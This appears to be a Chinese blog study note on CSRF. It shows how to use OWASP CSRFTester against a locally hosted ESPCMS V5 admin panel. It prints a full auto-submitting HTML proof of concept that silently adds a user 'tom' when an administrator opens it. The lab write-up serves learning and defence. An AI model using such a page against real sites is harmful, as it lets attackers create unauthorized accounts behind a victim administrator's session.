[理论-学习]Web安全-CSRF-基础03

声明:

由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。

笔记内容来源于各类网课

环境:ESPCMSV5(本地环境),CSRFTester

一、概述

使用CSRFTester工具生成POC,触发CSRF。

二、CSRF利用

首先打开CSRFTester,它会监听本地8008端口。我们配置浏览器代理为本地8008端口。

我们登陆系统后台,进入会员管理页面。

我们添加用户。

添加用户名,登录密码,确认密码,邮箱。

添加前打开CSRFTester的Start Recoding,抓取提交的表单。

抓取到提交的表单。

修改一下参数,参数为我们需要的新添加的用户信息。

我们将html保存到桌面即可。

其中的代码如下,也就是一个恶意页面,里面进行表单数据提交,触发CSRF漏洞。 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "22","21","16","19","778" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 5;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="GET" name="form0" action="http://127.0.0.1:8010/adminsoft/index.php?archive=management&action=load&digheight=150">
<input type="hidden" name="name" value="value"/> 
</form>
<form method="POST" name="form1" action="http://127.0.0.1:8010/adminsoft/index.php?archive=membermain&action=membersave">
<input type="hidden" name="inputclass" value="add"/>
<input type="hidden" name="lng" value="cn"/>
<input type="hidden" name="tab" value="true"/>
<input type="hidden" name="username" value="tom"/>
<input type="hidden" name="password" value="hitom"/>
<input type="hidden" name="password2" value="hitom"/>
<input type="hidden" name="email" value="2@hack.com"/>
<input type="hidden" name="question" value=""/>
<input type="hidden" name="answer" value=""/>
<input type="hidden" name="mcid" value="1"/>
<input type="hidden" name="alias" value=""/>
<input type="hidden" name="sex" value="1"/>
<input type="hidden" name="tel" value=""/>
<input type="hidden" name="mobile" value=""/>
<input type="hidden" name="birthday" value=""/>
<input type="hidden" name="address" value=""/>
<input type="hidden" name="zipcode" value=""/>
<input type="hidden" name="msn" value=""/>
<!-- 不需要使用的删除或注释 -->
<!-- <input type="hidden" name="qq" value=""/>
</form>
<form method="GET" name="form2" action="http://127.0.0.1:8010/adminsoft/index.php?archive=membermain&action=memberlist&mcid=1&isclass=&country=&province=&city=&district=&limitkey=&limitclass=&countnum=2&freshid=0.11032087375676158">
<input type="hidden" name="name" value="value"/> 
</form>
<form method="POST" name="form3" action="http://127.0.0.1:8010/adminsoft/index.php?archive=membermain&action=memberlist&mcid=1&isclass=&country=&province=&city=&district=&limitkey=&limitclass=">
<input type="hidden" name="MinPageid" value="0"/>
<input type="hidden" name="page_id" value="0"/>
<input type="hidden" name="MaxPerPage" value="12"/>
</form>
<form method="GET" name="form4" action="http://detectportal.firefox.com:80/success.txt">
<input type="hidden" name="name" value="value"/> 
</form> -->

</body>
</html>

使用刚才登陆管理员的浏览器打开这个index.html就触发了CSRF漏洞。

系统触发CSRF漏洞,成功添加用户tom。

  • 5
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值